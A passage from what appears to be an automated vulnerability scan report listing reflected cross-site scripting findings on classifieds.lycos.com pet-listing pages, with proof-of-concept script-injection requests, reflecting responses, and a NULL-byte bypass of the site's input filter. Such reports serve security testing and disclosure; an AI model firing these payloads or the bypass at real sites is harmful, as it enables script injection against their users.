GET /sale-pet-bird6dcb3"><script>alert(1)</script>447ff4bb05b/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:12:21 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:21 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-bird6dcb3"><script>alert(1)</script>447ff4bb05b/?mobile=1" rel="nofollow"> ...[SNIP]...
1.127. http://classifieds.lycos.com/sale-pet-bird/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-pet-bird/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1ff4"><script>alert(1)</script>97fa90e91b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-bird/?a1ff4"><script>alert(1)</script>97fa90e91b3=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:11:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:52 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-bird/?a1ff4"><script>alert(1)</script>97fa90e91b3=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ab5a"><script>alert(1)</script>9510e6a4e28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-cat1ab5a"><script>alert(1)</script>9510e6a4e28/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:12:21 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:21 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-cat1ab5a"><script>alert(1)</script>9510e6a4e28/?mobile=1" rel="nofollow"> ...[SNIP]...
1.129. http://classifieds.lycos.com/sale-pet-cat/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-pet-cat/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae787"><script>alert(1)</script>ab025033532 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-cat/?ae787"><script>alert(1)</script>ab025033532=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:11:47 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:47 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45645
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-cat/?ae787"><script>alert(1)</script>ab025033532=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a03f9"><script>alert(1)</script>de74cd9b04f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-doga03f9"><script>alert(1)</script>de74cd9b04f/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:47 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:47 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-doga03f9"><script>alert(1)</script>de74cd9b04f/?mobile=1" rel="nofollow"> ...[SNIP]...
1.131. http://classifieds.lycos.com/sale-pet-dog/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-pet-dog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc571"><script>alert(1)</script>0c857962aee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-dog/?cc571"><script>alert(1)</script>0c857962aee=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:04:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:14 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 56932
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog/?cc571"><script>alert(1)</script>0c857962aee=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fb30"><script>alert(1)</script>e061f61c48a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-dog9fb30"><script>alert(1)</script>e061f61c48a/12-week-old-boxer-puppies-2416167321 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:03:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:56 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17799
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog9fb30"><script>alert(1)</script>e061f61c48a/12-week-old-boxer-puppies-2416167321?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00103d3"><script>alert(1)</script>4422a66977f was submitted in the REST URL parameter 2. This input was echoed as 103d3"><script>alert(1)</script>4422a66977f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /sale-pet-dog/12-week-old-boxer-puppies-2416167321%00103d3"><script>alert(1)</script>4422a66977f HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:37 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog/12-week-old-boxer-puppies-2416167321%00103d3"><script>alert(1)</script>4422a66977f?mobile=1" rel="nofollow"> ...[SNIP]...
1.134. http://classifieds.lycos.com/sale-pet-dog/12-week-old-boxer-puppies-2416167321 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3206"><script>alert(1)</script>261d836b86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-dog/12-week-old-boxer-puppies-2416167321?c3206"><script>alert(1)</script>261d836b86=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:03:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:33 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/ Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23990
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog/12-week-old-boxer-puppies-2416167321?c3206"><script>alert(1)</script>261d836b86=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b83b1"><script>alert(1)</script>1d6589b91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-dogb83b1"><script>alert(1)</script>1d6589b91/cute-english-bulldog-puppies-2416163730 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:10 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dogb83b1"><script>alert(1)</script>1d6589b91/cute-english-bulldog-puppies-2416163730?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0034b07"><script>alert(1)</script>46ce0917467 was submitted in the REST URL parameter 2. This input was echoed as 34b07"><script>alert(1)</script>46ce0917467 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /sale-pet-dog/cute-english-bulldog-puppies-2416163730%0034b07"><script>alert(1)</script>46ce0917467 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:41 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog/cute-english-bulldog-puppies-2416163730%0034b07"><script>alert(1)</script>46ce0917467?mobile=1" rel="nofollow"> ...[SNIP]...
1.137. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416163730 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e64d"><script>alert(1)</script>505d3fe4c42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-dog/cute-english-bulldog-puppies-2416163730?8e64d"><script>alert(1)</script>505d3fe4c42=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:03:38 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:38 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/ Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23530
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog/cute-english-bulldog-puppies-2416163730?8e64d"><script>alert(1)</script>505d3fe4c42=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf88"><script>alert(1)</script>840e3c3ce1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-dog9cf88"><script>alert(1)</script>840e3c3ce1/cute-english-bulldog-puppies-2416171986 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:59:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:39 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17805
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog9cf88"><script>alert(1)</script>840e3c3ce1/cute-english-bulldog-puppies-2416171986?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004af5c"><script>alert(1)</script>54c8442343a was submitted in the REST URL parameter 2. This input was echoed as 4af5c"><script>alert(1)</script>54c8442343a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /sale-pet-dog/cute-english-bulldog-puppies-2416171986%004af5c"><script>alert(1)</script>54c8442343a HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:17 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog/cute-english-bulldog-puppies-2416171986%004af5c"><script>alert(1)</script>54c8442343a?mobile=1" rel="nofollow"> ...[SNIP]...
1.140. http://classifieds.lycos.com/sale-pet-dog/cute-english-bulldog-puppies-2416171986 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b318a"><script>alert(1)</script>f1eb897387b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-dog/cute-english-bulldog-puppies-2416171986?b318a"><script>alert(1)</script>f1eb897387b=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:15 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/ Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23473
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog/cute-english-bulldog-puppies-2416171986?b318a"><script>alert(1)</script>f1eb897387b=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e47d"><script>alert(1)</script>3e3b210a263 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-dog1e47d"><script>alert(1)</script>3e3b210a263/healthy-english-bulldog-puppies-2416171752 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
